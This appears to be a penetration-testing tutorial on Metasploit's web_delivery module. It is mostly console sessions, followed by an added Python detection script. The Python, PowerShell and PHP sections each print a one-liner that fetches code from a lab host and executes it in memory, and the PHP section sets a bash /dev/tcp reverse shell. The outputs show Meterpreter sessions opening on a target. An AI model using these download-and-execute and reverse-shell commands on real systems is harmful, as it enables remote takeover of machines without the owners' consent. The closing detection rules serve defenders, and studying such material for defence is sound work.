Metasploit Web Delivery

The Metasploit Web Delivery module starts a server on Kali; the content served at its URL contains the payload.

Python


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp
payload => python/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/7UBHdklf
[*] Local IP: http://172.16.100.182:8080/7UBHdklf
[*] Server started.
[*] Run the following command on the target machine:
Python:
python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"
root@kali:~# netstat -antlp | grep 8080
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 5657/ruby

Run this Python command on the test machine:

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (42231 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7292) at 2017-09-14 17:39:42 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

msf exploit(web_delivery) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer : dell-PC
OS : Windows 7 (Build 7601, Service Pack 1)
Architecture : x64
System Language : zh_CN
Meterpreter : python/windows

PowerShell


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 172.16.100.182
lhost => 172.16.100.182
msf exploit(web_delivery) > set target 2
target => 2
msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Started reverse TCP handler on 172.16.100.182:4444 
[*] Using URL: http://0.0.0.0:8080/AwOpQNolkZNZz
[*] Local IP: http://172.16.100.182:8080/AwOpQNolkZNZz
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');

 

Run this PowerShell statement on the test machine:

msf exploit(web_delivery) > [*] 172.16.100.1 web_delivery - Delivering Payload
[*] Sending stage (171583 bytes) to 172.16.100.1
[*] Meterpreter session 1 opened (172.16.100.182:4444 -> 172.16.100.1:7336) at 2017-09-14 17:46:00 +0800
[+] negotiating tlv encryption
[+] negotiated tlv encryption
[+] negotiated tlv encryption

PHP


msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set payload php/exec
payload => php/exec
msf exploit(web_delivery) > set target 1
target => 1
msf exploit(web_delivery) > set cmd "bash -i >& /dev/tcp/192.168.192.120/2345 0>&1"
cmd => bash -i >& /dev/tcp/192.168.192.120/2345 0>&1
msf exploit(web_delivery) > show options

Module options (exploit/multi/script/web_delivery):

Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)



Payload options (php/exec):

Name Current Setting Required Description
---- --------------- -------- -----------
CMD bash -i >& /dev/tcp/192.168.192.120/2345 0>&1 yes The command string to execute



Exploit target:

Id Name
-- ----
1 PHP



msf exploit(web_delivery) > run
[*] Exploit running as background job.

[*] Using URL: http://0.0.0.0:8080/ZuvhhHCImHt5wT1
[*] Local IP: http://172.16.100.182:8080/ZuvhhHCImHt5wT1
[*] Server started.
[*] Run the following command on the target machine:
php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"
msf exploit(web_delivery) > [*] 172.16.100.161 web_delivery - Delivering Payload

 

The reverse shell is received:

[root@server120 ~]# nc -vv -l -p 2345
Listening on any address 2345 (dbm)
Connection from 192.168.190.201:64671
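
For defenders, all three commands above share one shape: an interpreter run with inline code that fetches a URL and evaluates the response in memory. The following is an added example, not part of the original post or of Metasploit: it flags that shape in process-creation command lines. The rule names, host names and benign sample lines are constructed for illustration.

```python
import re

# One rule per one-liner on this page: an interpreter invoked with inline code
# that fetches a URL and passes the response straight to an evaluator.
RULES = {
    "python-urlopen-exec": re.compile(
        r"python[\d.]*(?:\.exe)?\s.*-c\s.*urlopen\s*\(.*\bexec\s*\(", re.I | re.S),
    # Lookaheads so both "IEX $z.downloadstring(...)" and "... | IEX" match.
    "powershell-downloadstring-iex": re.compile(
        r"powershell(?:\.exe)?\s(?=.*\b(?:iex|invoke-expression)\b)"
        r"(?=.*downloadstring\s*\()", re.I | re.S),
    "php-eval-file_get_contents": re.compile(
        r"php[\d.]*(?:\.exe)?\s.*-r\s.*\beval\s*\(\s*file_get_contents\s*\(", re.I | re.S),
}
URL = re.compile(r"https?://[^\s'\")]+", re.I)

def classify(cmdline):
    """Return (rule_name, fetched_url) for a matching command line, else None."""
    for name, rx in RULES.items():
        if rx.search(cmdline):
            m = URL.search(cmdline)
            return name, (m.group(0) if m else None)
    return None

def scan(events):
    """events: iterable of (host, cmdline) pairs; returns a list of alert dicts."""
    alerts = []
    for host, cmd in events:
        hit = classify(cmd)
        if hit:
            alerts.append({"host": host, "rule": hit[0], "url": hit[1]})
    return alerts

# Constructed events: the three flagged commands are the ones printed on this
# page; the host names and the benign lines are made up.
SAMPLE = [
    ("ws-01", r'''python -c "import sys; u=__import__('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlopen',));r=u.urlopen('http://172.16.100.182:8080/7UBHdklf');exec(r.read());"'''),
    ("ws-01", r'''python -c "print('hello')"'''),
    ("ws-01", r'''powershell.exe -nop -w hidden -c $z=new-object net.webclient;$z.proxy=[Net.WebRequest]::GetSystemWebProxy();$z.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $z.downloadstring('http://172.16.100.182:8080/AwOpQNolkZNZz');'''),
    ("ws-01", r'''powershell.exe -nop -c Get-Process'''),
    ("web-01", r'''php -d allow_url_fopen=true -r "eval(file_get_contents('http://172.16.100.182:8080/ZuvhhHCImHt5wT1'));"'''),
    ("web-01", r'''php -r "echo file_get_contents('/etc/hostname');"'''),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

The extracted URL gives responders the staging host and port to look for in proxy and firewall logs.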